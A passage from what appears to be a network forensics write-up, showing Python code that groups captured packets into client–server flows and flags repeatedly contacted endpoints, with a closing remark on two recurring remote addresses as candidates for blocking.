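        return None
    base = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
    # The table carries nanoseconds; strptime's %f stops at microseconds, so the
    # fraction is added by hand. All rows share one zone, so the offset cancels.
    seconds = (base - EPOCH).total_seconds() + int(m["frac"]) / 10 ** len(m["frac"])
    return seconds, (m["sip"], int(m["sport"])), (m["dip"], int(m["dport"]))


@dataclass
class Flow:
    client: tuple  # (ip, port) that sent the first packet seen for this pair (assumption)
    server: tuple
    first: float
    last: float
    packets_out: int = 0  # client -> server
    packets_in: int = 0   # server -> client

    def duration(self):
        return self.last - self.first


def parse_flows(text):
    """Group packets into bidirectional flows keyed by (client, server).

    Without TCP flags the endpoint that first appears as a source is taken as
    the client. Reuse of one ephemeral port for a later connection would be
    merged into the earlier flow; the report's rows above do not reuse ports.
    """
    packets = [p for p in map(parse_row, text.splitlines()) if p]
    packets.sort(key=lambda p: p[0])
    flows, by_pair = {}, {}
    for ts, src, dst in packets:
        pair = frozenset((src, dst))
        key = by_pair.get(pair)
        if key is None:
            key = (src, dst)
            by_pair[pair] = key
            flows[key] = Flow(src, dst, ts, ts)
        flow = flows[key]
        flow.last = max(flow.last, ts)
        if src == flow.client:
            flow.packets_out += 1
        else:
            flow.packets_in += 1
    return flows


def repeated_destinations(flows, min_flows=2):
    """Server endpoints reached by at least min_flows separate connections."""
    counts = Counter(f.server for f in flows.values())
    return {ep: n for ep, n in counts.items() if n >= min_flows}


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_ROWS)
    for (client, server), f in flows.items():
        print(f"{client[0]}:{client[1]} -> {server[0]}:{server[1]} "
              f"out={f.packets_out} in={f.packets_in} {f.duration():.3f}s")
    print("repeated:", repeated_destinations(flows))
```

Run against the full table rather than the constructed subset, the same two functions give the list of remote endpoints and show the alternating pattern of one HTTP connection to 132.226.8.169:80 followed by one HTTPS connection to 188.114.96.3:443, each from a fresh client port; that repetition is what `repeated_destinations` surfaces, and it is the starting point for deciding which of those endpoints are infrastructure worth blocking versus shared services the sample merely queries.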